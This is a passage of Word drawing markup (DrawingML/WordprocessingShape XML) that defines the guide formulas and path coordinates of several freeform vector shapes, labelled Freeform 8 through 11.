                                  <a:pt x="757"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513928899" name="Freeform 8"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6873" y="4056"/>
                            <a:ext cx="90" cy="198"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 395 w 535"/>
                              <a:gd name="T1" fmla="*/ 311 h 1187"/>
                              <a:gd name="T2" fmla="*/ 378 w 535"/>
                              <a:gd name="T3" fmla="*/ 330 h 1187"/>
                              <a:gd name="T4" fmla="*/ 395 w 535"/>
                              <a:gd name="T5" fmla="*/ 389 h 1187"/>
                              <a:gd name="T6" fmla="*/ 403 w 535"/>
                              <a:gd name="T7" fmla="*/ 447 h 1187"/>
                              <a:gd name="T8" fmla="*/ 411 w 535"/>
                              <a:gd name="T9" fmla="*/ 544 h 1187"/>
                              <a:gd name="T10" fmla="*/ 403 w 535"/>
                              <a:gd name="T11" fmla="*/ 661 h 1187"/>
                              <a:gd name="T12" fmla="*/ 362 w 535"/>
                              <a:gd name="T13" fmla="*/ 797 h 1187"/>
                              <a:gd name="T14" fmla="*/ 304 w 535"/>
                              <a:gd name="T15" fmla="*/ 875 h 1187"/>
                              <a:gd name="T16" fmla="*/ 247 w 535"/>
                              <a:gd name="T17" fmla="*/ 895 h 1187"/>
                              <a:gd name="T18" fmla="*/ 197 w 535"/>
                              <a:gd name="T19" fmla="*/ 875 h 1187"/>
                              <a:gd name="T20" fmla="*/ 156 w 535"/>
                              <a:gd name="T21" fmla="*/ 797 h 1187"/>
                              <a:gd name="T22" fmla="*/ 82 w 535"/>
                              <a:gd name="T23" fmla="*/ 583 h 1187"/>
                              <a:gd name="T24" fmla="*/ 66 w 535"/>
                              <a:gd name="T25" fmla="*/ 467 h 1187"/>
                              <a:gd name="T26" fmla="*/ 74 w 535"/>
                              <a:gd name="T27" fmla="*/ 408 h 1187"/>
                              <a:gd name="T28" fmla="*/ 90 w 535"/>
                              <a:gd name="T29" fmla="*/ 350 h 1187"/>
                              <a:gd name="T30" fmla="*/ 99 w 535"/>
                              <a:gd name="T31" fmla="*/ 291 h 1187"/>
                              <a:gd name="T32" fmla="*/ 82 w 535"/>
                              <a:gd name="T33" fmla="*/ 252 h 1187"/>
                              <a:gd name="T34" fmla="*/ 66 w 535"/>
                              <a:gd name="T35" fmla="*/ 155 h 1187"/>
                              <a:gd name="T36" fmla="*/ 49 w 535"/>
                              <a:gd name="T37" fmla="*/ 77 h 1187"/>
                              <a:gd name="T38" fmla="*/ 41 w 535"/>
                              <a:gd name="T39" fmla="*/ 38 h 1187"/>
                              <a:gd name="T40" fmla="*/ 41 w 535"/>
                              <a:gd name="T41" fmla="*/ 0 h 1187"/>
                              <a:gd name="T42" fmla="*/ 33 w 535"/>
                              <a:gd name="T43" fmla="*/ 19 h 1187"/>
                              <a:gd name="T44" fmla="*/ 8 w 535"/>
                              <a:gd name="T45" fmla="*/ 116 h 1187"/>
                              <a:gd name="T46" fmla="*/ 0 w 535"/>
                              <a:gd name="T47" fmla="*/ 233 h 1187"/>
                              <a:gd name="T48" fmla="*/ 0 w 535"/>
                              <a:gd name="T49" fmla="*/ 350 h 1187"/>
                              <a:gd name="T50" fmla="*/ 8 w 535"/>
                              <a:gd name="T51" fmla="*/ 467 h 1187"/>
                              <a:gd name="T52" fmla="*/ 57 w 535"/>
                              <a:gd name="T53" fmla="*/ 681 h 1187"/>
                              <a:gd name="T54" fmla="*/ 123 w 535"/>
                              <a:gd name="T55" fmla="*/ 875 h 1187"/>
                              <a:gd name="T56" fmla="*/ 189 w 535"/>
                              <a:gd name="T57" fmla="*/ 1011 h 1187"/>
                              <a:gd name="T58" fmla="*/ 238 w 535"/>
                              <a:gd name="T59" fmla="*/ 1089 h 1187"/>
                              <a:gd name="T60" fmla="*/ 296 w 535"/>
                              <a:gd name="T61" fmla="*/ 1148 h 1187"/>
                              <a:gd name="T62" fmla="*/ 337 w 535"/>
                              <a:gd name="T63" fmla="*/ 1187 h 1187"/>
                              <a:gd name="T64" fmla="*/ 387 w 535"/>
                              <a:gd name="T65" fmla="*/ 1187 h 1187"/>
                              <a:gd name="T66" fmla="*/ 428 w 535"/>
                              <a:gd name="T67" fmla="*/ 1148 h 1187"/>
                              <a:gd name="T68" fmla="*/ 493 w 535"/>
                              <a:gd name="T69" fmla="*/ 1050 h 1187"/>
                              <a:gd name="T70" fmla="*/ 518 w 535"/>
                              <a:gd name="T71" fmla="*/ 953 h 1187"/>
                              <a:gd name="T72" fmla="*/ 535 w 535"/>
                              <a:gd name="T73" fmla="*/ 836 h 1187"/>
                              <a:gd name="T74" fmla="*/ 535 w 535"/>
                              <a:gd name="T75" fmla="*/ 719 h 1187"/>
                              <a:gd name="T76" fmla="*/ 518 w 535"/>
                              <a:gd name="T77" fmla="*/ 603 h 1187"/>
                              <a:gd name="T78" fmla="*/ 502 w 535"/>
                              <a:gd name="T79" fmla="*/ 486 h 1187"/>
                              <a:gd name="T80" fmla="*/ 469 w 535"/>
                              <a:gd name="T81" fmla="*/ 408 h 1187"/>
                              <a:gd name="T82" fmla="*/ 436 w 535"/>
                              <a:gd name="T83" fmla="*/ 350 h 1187"/>
                              <a:gd name="T84" fmla="*/ 395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395" y="311"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="378" y="330"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395" y="389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="403" y="447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="411" y="544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="403" y="661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="362" y="797"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="304" y="875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="895"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="797"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82" y="583"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="99" y="291"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82" y="252"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="155"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="77"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="38"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="116"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="233"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="1011"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="1089"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="296" y="1148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="337" y="1187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="387" y="1187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="428" y="1148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="493" y="1050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="518" y="953"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="535" y="836"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="535" y="719"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="518" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="502" y="486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="469" y="408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="436" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395"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412103649" name="Freeform 9"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6929" y="4173"/>
                            <a:ext cx="82" cy="211"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 123 w 493"/>
                              <a:gd name="T1" fmla="*/ 934 h 1265"/>
                              <a:gd name="T2" fmla="*/ 131 w 493"/>
                              <a:gd name="T3" fmla="*/ 895 h 1265"/>
                              <a:gd name="T4" fmla="*/ 156 w 493"/>
                              <a:gd name="T5" fmla="*/ 934 h 1265"/>
                              <a:gd name="T6" fmla="*/ 181 w 493"/>
                              <a:gd name="T7" fmla="*/ 954 h 1265"/>
                              <a:gd name="T8" fmla="*/ 222 w 493"/>
                              <a:gd name="T9" fmla="*/ 973 h 1265"/>
                              <a:gd name="T10" fmla="*/ 271 w 493"/>
                              <a:gd name="T11" fmla="*/ 954 h 1265"/>
                              <a:gd name="T12" fmla="*/ 329 w 493"/>
                              <a:gd name="T13" fmla="*/ 856 h 1265"/>
                              <a:gd name="T14" fmla="*/ 362 w 493"/>
                              <a:gd name="T15" fmla="*/ 720 h 1265"/>
                              <a:gd name="T16" fmla="*/ 370 w 493"/>
                              <a:gd name="T17" fmla="*/ 603 h 1265"/>
                              <a:gd name="T18" fmla="*/ 362 w 493"/>
                              <a:gd name="T19" fmla="*/ 467 h 1265"/>
                              <a:gd name="T20" fmla="*/ 329 w 493"/>
                              <a:gd name="T21" fmla="*/ 370 h 1265"/>
                              <a:gd name="T22" fmla="*/ 238 w 493"/>
                              <a:gd name="T23" fmla="*/ 195 h 1265"/>
                              <a:gd name="T24" fmla="*/ 189 w 493"/>
                              <a:gd name="T25" fmla="*/ 156 h 1265"/>
                              <a:gd name="T26" fmla="*/ 164 w 493"/>
                              <a:gd name="T27" fmla="*/ 175 h 1265"/>
                              <a:gd name="T28" fmla="*/ 140 w 493"/>
                              <a:gd name="T29" fmla="*/ 214 h 1265"/>
                              <a:gd name="T30" fmla="*/ 115 w 493"/>
                              <a:gd name="T31" fmla="*/ 234 h 1265"/>
                              <a:gd name="T32" fmla="*/ 98 w 493"/>
                              <a:gd name="T33" fmla="*/ 195 h 1265"/>
                              <a:gd name="T34" fmla="*/ 66 w 493"/>
                              <a:gd name="T35" fmla="*/ 156 h 1265"/>
                              <a:gd name="T36" fmla="*/ 24 w 493"/>
                              <a:gd name="T37" fmla="*/ 117 h 1265"/>
                              <a:gd name="T38" fmla="*/ 8 w 493"/>
                              <a:gd name="T39" fmla="*/ 97 h 1265"/>
                              <a:gd name="T40" fmla="*/ 0 w 493"/>
                              <a:gd name="T41" fmla="*/ 97 h 1265"/>
                              <a:gd name="T42" fmla="*/ 8 w 493"/>
                              <a:gd name="T43" fmla="*/ 78 h 1265"/>
                              <a:gd name="T44" fmla="*/ 49 w 493"/>
                              <a:gd name="T45" fmla="*/ 19 h 1265"/>
                              <a:gd name="T46" fmla="*/ 90 w 493"/>
                              <a:gd name="T47" fmla="*/ 0 h 1265"/>
                              <a:gd name="T48" fmla="*/ 140 w 493"/>
                              <a:gd name="T49" fmla="*/ 0 h 1265"/>
                              <a:gd name="T50" fmla="*/ 189 w 493"/>
                              <a:gd name="T51" fmla="*/ 19 h 1265"/>
                              <a:gd name="T52" fmla="*/ 280 w 493"/>
                              <a:gd name="T53" fmla="*/ 136 h 1265"/>
                              <a:gd name="T54" fmla="*/ 362 w 493"/>
                              <a:gd name="T55" fmla="*/ 292 h 1265"/>
                              <a:gd name="T56" fmla="*/ 419 w 493"/>
                              <a:gd name="T57" fmla="*/ 448 h 1265"/>
                              <a:gd name="T58" fmla="*/ 452 w 493"/>
                              <a:gd name="T59" fmla="*/ 564 h 1265"/>
                              <a:gd name="T60" fmla="*/ 477 w 493"/>
                              <a:gd name="T61" fmla="*/ 701 h 1265"/>
                              <a:gd name="T62" fmla="*/ 493 w 493"/>
                              <a:gd name="T63" fmla="*/ 798 h 1265"/>
                              <a:gd name="T64" fmla="*/ 493 w 493"/>
                              <a:gd name="T65" fmla="*/ 915 h 1265"/>
                              <a:gd name="T66" fmla="*/ 477 w 493"/>
                              <a:gd name="T67" fmla="*/ 1012 h 1265"/>
                              <a:gd name="T68" fmla="*/ 436 w 493"/>
                              <a:gd name="T69" fmla="*/ 1168 h 1265"/>
                              <a:gd name="T70" fmla="*/ 395 w 493"/>
                              <a:gd name="T71" fmla="*/ 1226 h 1265"/>
                              <a:gd name="T72" fmla="*/ 345 w 493"/>
                              <a:gd name="T73" fmla="*/ 1265 h 1265"/>
                              <a:gd name="T74" fmla="*/ 296 w 493"/>
                              <a:gd name="T75" fmla="*/ 1265 h 1265"/>
                              <a:gd name="T76" fmla="*/ 247 w 493"/>
                              <a:gd name="T77" fmla="*/ 1226 h 1265"/>
                              <a:gd name="T78" fmla="*/ 197 w 493"/>
                              <a:gd name="T79" fmla="*/ 1187 h 1265"/>
                              <a:gd name="T80" fmla="*/ 164 w 493"/>
                              <a:gd name="T81" fmla="*/ 1129 h 1265"/>
                              <a:gd name="T82" fmla="*/ 140 w 493"/>
                              <a:gd name="T83" fmla="*/ 1031 h 1265"/>
                              <a:gd name="T84" fmla="*/ 123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934"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="131" y="895"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="934"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="954"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="222" y="973"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271" y="954"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="329" y="856"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="362" y="720"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="362" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="329" y="370"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="156"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="164" y="175"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="98" y="195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="156"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="24" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="362" y="292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="419" y="448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="452" y="564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="477" y="701"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="493" y="798"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="493" y="915"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="477" y="1012"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="436" y="1168"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395" y="1226"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="345" y="1265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="296" y="1265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="1226"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="1187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="164" y="1129"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="1031"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123"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759154386" name="Freeform 10"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6876" y="4072"/>
                            <a:ext cx="128" cy="302"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8 w 765"/>
                              <a:gd name="T1" fmla="*/ 0 h 1809"/>
                              <a:gd name="T2" fmla="*/ 0 w 765"/>
                              <a:gd name="T3" fmla="*/ 97 h 1809"/>
                              <a:gd name="T4" fmla="*/ 16 w 765"/>
                              <a:gd name="T5" fmla="*/ 253 h 1809"/>
                              <a:gd name="T6" fmla="*/ 25 w 765"/>
                              <a:gd name="T7" fmla="*/ 370 h 1809"/>
                              <a:gd name="T8" fmla="*/ 8 w 765"/>
                              <a:gd name="T9" fmla="*/ 467 h 1809"/>
                              <a:gd name="T10" fmla="*/ 8 w 765"/>
                              <a:gd name="T11" fmla="*/ 486 h 1809"/>
                              <a:gd name="T12" fmla="*/ 25 w 765"/>
                              <a:gd name="T13" fmla="*/ 506 h 1809"/>
                              <a:gd name="T14" fmla="*/ 41 w 765"/>
                              <a:gd name="T15" fmla="*/ 486 h 1809"/>
                              <a:gd name="T16" fmla="*/ 66 w 765"/>
                              <a:gd name="T17" fmla="*/ 506 h 1809"/>
                              <a:gd name="T18" fmla="*/ 156 w 765"/>
                              <a:gd name="T19" fmla="*/ 584 h 1809"/>
                              <a:gd name="T20" fmla="*/ 255 w 765"/>
                              <a:gd name="T21" fmla="*/ 700 h 1809"/>
                              <a:gd name="T22" fmla="*/ 346 w 765"/>
                              <a:gd name="T23" fmla="*/ 875 h 1809"/>
                              <a:gd name="T24" fmla="*/ 403 w 765"/>
                              <a:gd name="T25" fmla="*/ 1031 h 1809"/>
                              <a:gd name="T26" fmla="*/ 452 w 765"/>
                              <a:gd name="T27" fmla="*/ 1206 h 1809"/>
                              <a:gd name="T28" fmla="*/ 485 w 765"/>
                              <a:gd name="T29" fmla="*/ 1420 h 1809"/>
                              <a:gd name="T30" fmla="*/ 485 w 765"/>
                              <a:gd name="T31" fmla="*/ 1537 h 1809"/>
                              <a:gd name="T32" fmla="*/ 477 w 765"/>
                              <a:gd name="T33" fmla="*/ 1634 h 1809"/>
                              <a:gd name="T34" fmla="*/ 469 w 765"/>
                              <a:gd name="T35" fmla="*/ 1693 h 1809"/>
                              <a:gd name="T36" fmla="*/ 469 w 765"/>
                              <a:gd name="T37" fmla="*/ 1712 h 1809"/>
                              <a:gd name="T38" fmla="*/ 510 w 765"/>
                              <a:gd name="T39" fmla="*/ 1732 h 1809"/>
                              <a:gd name="T40" fmla="*/ 568 w 765"/>
                              <a:gd name="T41" fmla="*/ 1712 h 1809"/>
                              <a:gd name="T42" fmla="*/ 592 w 765"/>
                              <a:gd name="T43" fmla="*/ 1712 h 1809"/>
                              <a:gd name="T44" fmla="*/ 650 w 765"/>
                              <a:gd name="T45" fmla="*/ 1751 h 1809"/>
                              <a:gd name="T46" fmla="*/ 732 w 765"/>
                              <a:gd name="T47" fmla="*/ 1790 h 1809"/>
                              <a:gd name="T48" fmla="*/ 757 w 765"/>
                              <a:gd name="T49" fmla="*/ 1809 h 1809"/>
                              <a:gd name="T50" fmla="*/ 765 w 765"/>
                              <a:gd name="T51" fmla="*/ 1809 h 1809"/>
                              <a:gd name="T52" fmla="*/ 765 w 765"/>
                              <a:gd name="T53" fmla="*/ 1790 h 1809"/>
                              <a:gd name="T54" fmla="*/ 757 w 765"/>
                              <a:gd name="T55" fmla="*/ 1732 h 1809"/>
                              <a:gd name="T56" fmla="*/ 740 w 765"/>
                              <a:gd name="T57" fmla="*/ 1537 h 1809"/>
                              <a:gd name="T58" fmla="*/ 724 w 765"/>
                              <a:gd name="T59" fmla="*/ 1401 h 1809"/>
                              <a:gd name="T60" fmla="*/ 724 w 765"/>
                              <a:gd name="T61" fmla="*/ 1342 h 1809"/>
                              <a:gd name="T62" fmla="*/ 732 w 765"/>
                              <a:gd name="T63" fmla="*/ 1206 h 1809"/>
                              <a:gd name="T64" fmla="*/ 724 w 765"/>
                              <a:gd name="T65" fmla="*/ 1109 h 1809"/>
                              <a:gd name="T66" fmla="*/ 716 w 765"/>
                              <a:gd name="T67" fmla="*/ 1109 h 1809"/>
                              <a:gd name="T68" fmla="*/ 691 w 765"/>
                              <a:gd name="T69" fmla="*/ 1128 h 1809"/>
                              <a:gd name="T70" fmla="*/ 642 w 765"/>
                              <a:gd name="T71" fmla="*/ 1148 h 1809"/>
                              <a:gd name="T72" fmla="*/ 601 w 765"/>
                              <a:gd name="T73" fmla="*/ 1148 h 1809"/>
                              <a:gd name="T74" fmla="*/ 510 w 765"/>
                              <a:gd name="T75" fmla="*/ 1070 h 1809"/>
                              <a:gd name="T76" fmla="*/ 428 w 765"/>
                              <a:gd name="T77" fmla="*/ 953 h 1809"/>
                              <a:gd name="T78" fmla="*/ 370 w 765"/>
                              <a:gd name="T79" fmla="*/ 817 h 1809"/>
                              <a:gd name="T80" fmla="*/ 296 w 765"/>
                              <a:gd name="T81" fmla="*/ 603 h 1809"/>
                              <a:gd name="T82" fmla="*/ 247 w 765"/>
                              <a:gd name="T83" fmla="*/ 370 h 1809"/>
                              <a:gd name="T84" fmla="*/ 214 w 765"/>
                              <a:gd name="T85" fmla="*/ 155 h 1809"/>
                              <a:gd name="T86" fmla="*/ 206 w 765"/>
                              <a:gd name="T87" fmla="*/ 97 h 1809"/>
                              <a:gd name="T88" fmla="*/ 214 w 765"/>
                              <a:gd name="T89" fmla="*/ 58 h 1809"/>
                              <a:gd name="T90" fmla="*/ 206 w 765"/>
                              <a:gd name="T91" fmla="*/ 19 h 1809"/>
                              <a:gd name="T92" fmla="*/ 197 w 765"/>
                              <a:gd name="T93" fmla="*/ 19 h 1809"/>
                              <a:gd name="T94" fmla="*/ 156 w 765"/>
                              <a:gd name="T95" fmla="*/ 58 h 1809"/>
                              <a:gd name="T96" fmla="*/ 107 w 765"/>
                              <a:gd name="T97" fmla="*/ 39 h 1809"/>
                              <a:gd name="T98" fmla="*/ 41 w 765"/>
                              <a:gd name="T99" fmla="*/ 0 h 1809"/>
                              <a:gd name="T100" fmla="*/ 8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8" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="370"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="584"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="346" y="875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="403" y="1031"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="452" y="1206"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="485" y="1420"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="485" y="1537"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="477" y="1634"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="469" y="1693"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="469" y="1712"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="510" y="1732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="568" y="1712"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="592" y="1712"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="650" y="1751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="732" y="1790"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="757" y="1809"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="765" y="1809"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="765" y="1790"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="757" y="1732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="740" y="1537"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="724" y="1401"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="724" y="1342"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="732" y="1206"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="724" y="1109"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="716" y="1109"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="691" y="1128"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="642" y="1148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="601" y="1148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="510" y="1070"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="428" y="953"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370" y="817"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="296" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="370"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="155"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="206" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="206" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8"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150634730" name="Freeform 11"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5598" y="6235"/>
                            <a:ext cx="89" cy="195"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 132 w 535"/>
                              <a:gd name="T1" fmla="*/ 857 h 1168"/>
                              <a:gd name="T2" fmla="*/ 148 w 535"/>
                              <a:gd name="T3" fmla="*/ 837 h 1168"/>
                              <a:gd name="T4" fmla="*/ 140 w 535"/>
                              <a:gd name="T5" fmla="*/ 798 h 1168"/>
                              <a:gd name="T6" fmla="*/ 124 w 535"/>
                              <a:gd name="T7" fmla="*/ 740 h 1168"/>
                              <a:gd name="T8" fmla="*/ 124 w 535"/>
                              <a:gd name="T9" fmla="*/ 643 h 1168"/>
                              <a:gd name="T10" fmla="*/ 132 w 535"/>
                              <a:gd name="T11" fmla="*/ 506 h 1168"/>
                              <a:gd name="T12" fmla="*/ 173 w 535"/>
                              <a:gd name="T13" fmla="*/ 390 h 1168"/>
                              <a:gd name="T14" fmla="*/ 223 w 535"/>
                              <a:gd name="T15" fmla="*/ 292 h 1168"/>
                              <a:gd name="T16" fmla="*/ 280 w 535"/>
                              <a:gd name="T17" fmla="*/ 273 h 1168"/>
                              <a:gd name="T18" fmla="*/ 330 w 535"/>
                              <a:gd name="T19" fmla="*/ 312 h 1168"/>
                              <a:gd name="T20" fmla="*/ 371 w 535"/>
                              <a:gd name="T21" fmla="*/ 370 h 1168"/>
                              <a:gd name="T22" fmla="*/ 445 w 535"/>
                              <a:gd name="T23" fmla="*/ 584 h 1168"/>
